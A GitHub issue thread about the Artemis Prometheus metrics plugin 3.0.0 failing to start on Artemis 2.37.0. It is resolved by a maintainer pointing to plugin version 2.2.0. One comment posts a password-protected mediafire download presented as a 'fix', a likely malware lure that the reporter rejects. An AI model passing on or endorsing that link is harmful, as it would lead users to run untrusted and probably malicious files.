### ISSUE TITLE
Failed startup of context for war version 3.0.0

### ISSUE THREAD

**Issue by Stevenpc3** [rh-messaging/artemis-prometheus-metrics-plugin#35]
I am now getting this error when using the latest war and jar with artemis version 2.37.0

![image](https://github.com/user-attachments/assets/c8c7cdc0-7111-4500-934c-7ecb17b194fb)

It worked fine with the older version 1 and artemis 2.34

I am copying in the new files to the same location as the old files that worked

```
COPY plugins/artemis-prometheus-metrics-plugin-3.0.0.jar $ARTEMIS_BROKER_HOME/lib
RUN mkdir $ARTEMIS_BROKER_HOME/web
COPY plugins/artemis-prometheus-metrics-plugin-servlet-3.0.0.war $ARTEMIS_BROKER_HOME/web
```

my broker uses the NEW plugin as describe in the README

```
{{ if .Values.metrics.enabled -}}
      <metrics>
         <jvm-gc>{{ .Values.metrics.jvm.gc.enabled }}</jvm-gc>
         <jvm-memory>{{ .Values.metrics.jvm.memory.enabled }}</jvm-memory>
         <jvm-threads>{{ .Values.metrics.jvm.threads.enabled }}</jvm-threads>
         <netty-pool>{{ .Values.metrics.nettyPool.enabled }}</netty-pool>
         <file-descriptors>{{ .Values.metrics.fileDescriptors.enabled }}</file-descriptors>
         <processor>{{ .Values.metrics.processor.enabled }}</processor>
         <uptime>{{ .Values.metrics.uptime.enabled }}</uptime>
         <logging>{{ .Values.metrics.logging.enabled }}</logging>
         <security-caches>{{ .Values.metrics.securityCaches.enabled }}</security-caches>
         {{ if .Values.metrics.serviceMonitor.enabled -}}
         <plugin class-name="com.redhat.amq.broker.core.server.metrics.plugins.ArtemisPrometheusMetricsPlugin"/>
         {{ else -}}
         <plugin class-name="org.apache.activemq.artemis.core.server.metrics.plugins.LoggingMetricsPlugin"/>
         {{- end }}
      </metrics>
      {{- end }}
```

**Comment by Stevenpc3** [comment]
Need to double check that the "metrics.war" was there or not.  Might have copied the wrong file.  I assumed 'artemis-prometheus-metrics-plugin-servlet-3.0.0.war' was the new name

![image](https://github.com/user-attachments/assets/9a028696-7779-4098-a5c1-41d495fb61b8)

**Comment by Stevenpc3** [comment]
These are the changes that went from working to broken

![image](https://github.com/user-attachments/assets/7368c8e2-331c-4329-8313-92bdff04fa1f)

**Comment by Stevenpc3** [comment]
Maybe I should only be using tag 2.2.0?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Stevenpc3** [comment]
No. I will NOT install some strange file from some strange person.

If you have a real fix, please show the source code for me to build.

Someone, please delete this person's potential malware link.

Get Outlook for Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by Stevenpc3** [comment]
It's likely because the image I'm using does not have Jakarta and I either need to update or use 2.2.0. I just thought the Artemis would have included the dependencies I guess.

**Comment by brusdev** [comment]
artemis-prometheus-metrics-plugin 3.x is for future ActiveMQArtemis versions. You can use artemis-prometheus-metrics-plugin 2.2.0 for ActiveMQArtemis 2.37.0.
